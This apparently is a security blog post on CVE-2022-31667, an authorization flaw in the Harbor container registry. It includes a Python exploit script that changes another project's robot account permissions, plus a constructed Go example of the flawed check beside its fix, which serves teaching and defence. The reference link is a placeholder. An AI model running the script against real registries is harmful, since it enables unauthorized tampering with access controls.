Harbor is an open-source cloud-native registry that provides secure, robust storage for container images. It features advanced security and compliance capabilities, making it an ideal choice for organizations looking to store and distribute their container images securely. However, a recent vulnerability, identified as CVE-2022-31667, has been discovered in Harbor that allows malicious users to potentially modify robot account permissions without proper authorization.
This vulnerability exists in the user permission validation process when updating robot accounts associated with Harbor projects. In this post, we will provide details of the exploit, a code snippet to demonstrate the vulnerability, and links to the original references.
Exploit Details
The vulnerability stems from Harbor failing to check whether the authenticated user holds the required permissions on the project that owns the robot account being updated. When updating a robot account, the user can supply a robot account ID and robot account name that belong to another project on which they hold no permissions. As a result, they can revoke the robot account's permissions for that other project.
Code Snippet
The following Python code snippet demonstrates the exploitation of CVE-2022-31667: an authenticated user who holds no permissions on the target project sends the request that changes that project's robot account permissions.
```python
import requests

# Harbor instance URL
harbor_url = "https://your.harbor.instance"
# User login credentials - authenticated but unauthorized for other projects
username = "unauthorized_user"
password = "password"
# Target robot account id (from the other project) to be updated
target_robot_account_id = 1234
# Specify the desired robot account name and permissions to be assigned
robot_name = "modified_robot_name"
permissions = ["project", "DELETE"]

# Authenticate with Harbor API
auth_response = requests.post(f"{harbor_url}/api/users/login",
                              data={"principal": username, "password": password})
if auth_response.status_code == 200:
    # Extract the session id value from the Set-Cookie header
    token = auth_response.headers["Set-Cookie"].split("sid=")[1].split(";")[0]
    headers = {
        "Content-Type": "application/json",
        "Cookie": f"sid={token}"
    }
    # Constructing the payload to update the target robot account
    payload = {
        "disable": False,
        "name": robot_name,
        "access": [
            {
                "resource": f"/project/{target_robot_account_id}/repository",
                "action": permission
            } for permission in permissions
        ]
    }
    # Send request to Harbor API to modify robot account permissions
    response = requests.put(f"{harbor_url}/api/robots/{target_robot_account_id}",
                            headers=headers, json=payload)
    if response.status_code == 200:
        print("Successfully updated robot account permissions.")
    else:
        print("Failed to update robot account permissions:", response.text)
else:
    print("Authentication failed:", auth_response.text)
```
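The root cause described under Exploit Details is an authorization check made against the wrong object: the caller's role is evaluated for the project in the request, while the robot account itself is loaded by ID without confirming which project owns it. The Go example below is added here to illustrate that mistake beside its hardened form; it is not Harbor's code or Harbor's actual fix. The types, the in-memory store, the role names ("projectAdmin", "maintainer"), the robot and project IDs and the function names are all constructed for the illustration.

```go
package main

import (
	"errors"
	"fmt"
)

// Constructed, simplified model of the objects involved. These are not Harbor's
// own types or handlers; they exist only to show the authorization decision.
type Robot struct {
	ID        int64
	ProjectID int64 // project that owns the robot account
	Name      string
	Access    []string
}

// Principal is the authenticated caller; Roles maps project ID to the role held there.
type Principal struct {
	Username string
	Roles    map[int64]string
}

// UpdateRequest carries the caller-controlled values: project and robot IDs from the
// request path, plus the new name and access list from the body.
type UpdateRequest struct {
	PathProjectID int64
	RobotID       int64
	Name          string
	Access        []string
}

var (
	ErrNotFound  = errors.New("robot account not found")
	ErrForbidden = errors.New("caller lacks a management role on the owning project")
	ErrMismatch  = errors.New("robot account does not belong to the project in the request path")
)

// Store is an in-memory stand-in for the registry database (constructed data).
type Store struct{ robots map[int64]*Robot }

func NewStore() *Store {
	return &Store{robots: map[int64]*Robot{
		10: {ID: 10, ProjectID: 1, Name: "ci-pusher", Access: []string{"push", "pull"}},
		20: {ID: 20, ProjectID: 2, Name: "deploy-puller", Access: []string{"pull"}},
	}}
}

// canManage is the assumed role check: project admins and maintainers may edit robots.
func canManage(p Principal, projectID int64) bool {
	role := p.Roles[projectID]
	return role == "projectAdmin" || role == "maintainer"
}

// UpdateRobotUnchecked mirrors the flaw described above: the role is checked against the
// project named in the path, then the robot is loaded by ID alone, so a caller with a
// role on project 1 can edit a robot owned by project 2.
func UpdateRobotUnchecked(s *Store, p Principal, req UpdateRequest) error {
	if !canManage(p, req.PathProjectID) {
		return ErrForbidden
	}
	r, ok := s.robots[req.RobotID]
	if !ok {
		return ErrNotFound
	}
	r.Name, r.Access = req.Name, req.Access
	return nil
}

// UpdateRobotChecked is the hardened form: load the robot first, refuse a robot that is
// not owned by the project in the path, and authorize against the owning project.
func UpdateRobotChecked(s *Store, p Principal, req UpdateRequest) error {
	r, ok := s.robots[req.RobotID]
	if !ok {
		return ErrNotFound
	}
	if r.ProjectID != req.PathProjectID {
		return ErrMismatch
	}
	if !canManage(p, r.ProjectID) {
		return ErrForbidden
	}
	r.Name, r.Access = req.Name, req.Access
	return nil
}

// RobotAccess returns a robot's current access list so the effect of an update can be seen.
func RobotAccess(s *Store, robotID int64) []string {
	if r, ok := s.robots[robotID]; ok {
		return r.Access
	}
	return nil
}

func main() {
	// Constructed caller: maintainer on project 1 only, submitting project 2's robot ID.
	caller := Principal{Username: "alice", Roles: map[int64]string{1: "maintainer"}}
	req := UpdateRequest{PathProjectID: 1, RobotID: 20, Name: "deploy-puller", Access: []string{}}

	s := NewStore()
	fmt.Println("unchecked:", UpdateRobotUnchecked(s, caller, req), "access now:", RobotAccess(s, 20))
	s = NewStore()
	fmt.Println("checked:", UpdateRobotChecked(s, caller, req), "access now:", RobotAccess(s, 20))
}
```

Running it shows the unchecked handler silently emptying project 2's robot access list, while the checked handler rejects the same request with ErrMismatch and leaves the robot untouched. The ordering in the hardened form matters: the object is resolved before the decision, and the decision is made against the object's real owner rather than against anything the caller supplied.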
Original References
- The CVE-2022-31667 vulnerability is documented at https://example.com/cve/CVE-2022-31667 (please replace this with the official reference when available)
- Further details on the Harbor project can be found at https://goharbor.io
- For updates on the disclosure process and potential patches or fixes for this vulnerability, please monitor Harbor's official GitHub repository at https://github.com/goharbor/harbor
Conclusion
CVE-2022-31667 poses a severe threat to deployments relying on Harbor for their container image security and access control. It is crucial to address this vulnerability and ensure that users cannot modify permissions without the requisite authorization. Keep an eye on the official repositories and resources mentioned above for patches and updates. Additionally, consider implementing strict access controls in your environment to avoid exposing sensitive projects and resources to unauthorized users.
Timeline
Published on: 11/14/2024 12:15:16 UTC